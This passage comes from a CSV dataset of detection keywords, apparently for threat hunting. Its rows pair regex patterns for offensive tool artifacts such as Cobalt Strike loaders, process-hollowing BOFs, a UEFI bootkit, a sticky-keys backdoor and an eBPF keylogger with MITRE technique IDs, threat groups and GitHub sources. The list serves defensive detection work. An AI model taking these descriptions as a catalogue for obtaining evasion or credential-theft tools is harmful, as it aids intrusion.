TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku7/BokuLoader*",".{0,1000}boku7\/BokuLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku7/HOLLOW*",".{0,1000}boku7\/HOLLOW.{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","257","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "*BokuLoader.cna*",".{0,1000}BokuLoader\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*BokuLoader.exe*",".{0,1000}BokuLoader\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*BokuLoader.x64*",".{0,1000}BokuLoader\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*bolt://localhost:7687*",".{0,1000}bolt\:\/\/localhost\:7687.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*Bonfee/CVE-2022-0995*",".{0,1000}Bonfee\/CVE\-2022\-0995.{0,1000}","offensive_tool_keyword","POC","CVE-2022-0995 exploit","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/Bonfee/CVE-2022-0995","1","1","N/A","N/A","5","494","70","2022-03-27T09:07:01Z","2022-03-26T21:46:09Z" "*BooExecutorImpl.cs*",".{0,1000}BooExecutorImpl\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*book.hacktricks.xyz/*",".{0,1000}book\.hacktricks\.xyz\/.{0,1000}","offensive_tool_keyword","hacktricks.xyz","site often consulted by pentester","T1596 - T1592","TA0043","N/A","N/A","Reconnaissance","https://hacktricks.xyz","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*bootkit-rs.git*",".{0,1000}bootkit\-rs\.git.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*bootkit-rs-master*",".{0,1000}bootkit\-rs\-master.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*Booty\master_password_list.csv*",".{0,1000}Booty\\master_password_list\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*BorjaMerino*Pazuzu*",".{0,1000}BorjaMerino.{0,1000}Pazuzu.{0,1000}","offensive_tool_keyword","Pazuzu","Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.","T1055 - T1027 - T1071 - T1059","TA0002 - TA0005 - TA0011","N/A","N/A","Exploitation tools","https://github.com/BorjaMerino/Pazuzu","1","1","N/A","N/A","3","213","64","2020-08-04T18:49:36Z","2015-10-05T12:23:17Z" "*Bot_MSF_Exp_*.py*",".{0,1000}Bot_MSF_Exp_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Bot_Python_Poc_Log4j2_VMwareHorizon.py*",".{0,1000}Bot_Python_Poc_Log4j2_VMwareHorizon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*bpassthehash*",".{0,1000}bpassthehash.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bpf_keylogger: Log key presses and mouse button events systemwide using eBPF*",".{0,1000}bpf_keylogger\:\sLog\skey\spresses\sand\smouse\sbutton\sevents\ssystemwide\susing\seBPF.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*bpowerpick*",".{0,1000}bpowerpick.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bpsexec_command*",".{0,1000}bpsexec_command.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bpsexec_command*",".{0,1000}bpsexec_command.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bpsexec_psh*",".{0,1000}bpsexec_psh.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bpsinject*",".{0,1000}bpsinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bpsinject*",".{0,1000}bpsinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bpysecdump.exe*",".{0,1000}bpysecdump\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*brc4_ldap_sentinel.py*",".{0,1000}brc4_ldap_sentinel\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*Brc4ConfigExtractor.exe*",".{0,1000}Brc4ConfigExtractor\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Brc4DecodeString*",".{0,1000}Brc4DecodeString.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*breg add *HK*",".{0,1000}breg\sadd\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*breg delete *HK*",".{0,1000}breg\sdelete\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*breg query *HK*",".{0,1000}breg\squery\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - 